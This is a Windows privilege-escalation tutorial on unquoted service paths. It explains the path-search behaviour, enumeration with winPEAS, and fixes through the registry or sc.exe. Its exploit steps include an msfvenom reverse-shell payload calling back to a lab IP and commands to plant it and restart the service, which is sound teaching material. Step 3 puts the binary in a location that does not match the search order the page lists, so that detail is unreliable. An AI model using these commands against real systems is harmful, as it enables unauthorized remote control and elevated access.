8 - Unquoted Service Path

Topics

1. Introduction to the Windows Shells

2. Windows Permissions

3. Reverse Shells in Windows

4. SeImpersonatePrivilege Exploitation

5. On Cross Compilation

6. Windows Services

7. Weak Service Permissions

8. Unquoted Service Path

9. DLL Hijacking

10. Always Install Elevated

11. Files with Sensitive Data

12. Windows Hashes

13. Stored Credentials and the Windows Vault

14. Scheduled Task

15. Critical Registry Paths

16. Useful Tools

17. AMSI Bypass

Unquoted Service Path Vulnerability

The unquoted service path vulnerability arises when a Windows service binary's path contains spaces but lacks proper quotation marks. This leads the operating system to search for the service binary using a specific sequence of rules, potentially allowing an attacker to exploit the path traversal behavior.

When starting a service, Windows interprets its binary path as specified in the service configuration. If the path contains spaces and is unquoted, the system checks multiple potential executable paths in order, which can lead to unintended execution.

Example Service Configuration

SERVICE_NAME: SimpleService
    BINARY_PATH_NAME: C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe

If the above path is unquoted, Windows will attempt to execute the following binaries in this order:

1. C:\Users\Quickemu\Downloads\Example.exe

2. C:\Users\Quickemu\Downloads\Example Directory\Another.exe

3. C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe

Attack Scenario

An attacker with write access to any of the intermediary directories can plant a malicious binary, such as Example.exe. When the service starts, Windows will execute the malicious binary instead of the intended service binary.

---

Exploiting Unquoted Service Paths

Exploit Steps

1. Identify the Vulnerable Service View the service configuration:

   sc.exe qc SimpleService

2. Create a Malicious Binary Generate a reverse shell binary:

   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

3. Place the Malicious Binary in a Targeted Path

   move malicious.exe "C:\Users\Quickemu\Downloads\Example Directory\Example.exe"

4. Restart the Service

   sc.exe stop SimpleService
   sc.exe start SimpleService

When the service restarts, Windows will execute Example.exe instead of simpleService.exe, effectively hijacking the service.

---

Additional Examples

Example 1

For the binary path:

C:\Program Files (x86)\Company\Company App\App.exe

The following binaries will be checked in order:

1. C:\Program.exe

2. C:\Program Files.exe

3. C:\Program Files (x86)\Company\Company.exe

4. C:\Program Files (x86)\Company\Company App\App.exe

Example 2

For the binary path:

C:\Program\Cool Company\Cool Binary.exe

The following binaries will be checked in order:

1. C:\Program\Cool.exe

2. C:\Program\Cool Company\Cool.exe

3. C:\Program\Cool Company\Cool Binary.exe

---

Enumeration of Unquoted Service Paths

Using winPEAS

winPEAS can identify unquoted service paths.

.\winPEAS.exe quiet servicesinfo

Example Output

Look for the following indicators in the output:

SimpleService(SimpleService)[C:\Users\Quickemu\Downloads\Example Directory\Another\simpleService.exe]  
No quotes and Space detected  
File Permissions: Quickemu [AllAccess]  
Possible DLL Hijacking in binary folder: C:\Users\Quickemu\Downloads\Example Directory (Quickemu [AllAccess])

---

Fixing the Vulnerability

Fix Using RegEdit

1. Open the Registry Editor (regedit.exe).

2. Navigate to:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SimpleService

3. Locate the ImagePath key and add quotes around the binary path:

   "C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe"

Fix Using sc.exe

Use the sc.exe command to update the service path with quotes:

sc.exe config SimpleService binpath="\"C:\Users\Quickemu\Downloads\Example Directory\Another Directory\simpleService.exe\""

---

Other Resources

• Windows Privilege Escalation: Unquoted Service Path
• Fixing Unquoted Search Paths Using Powershell

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗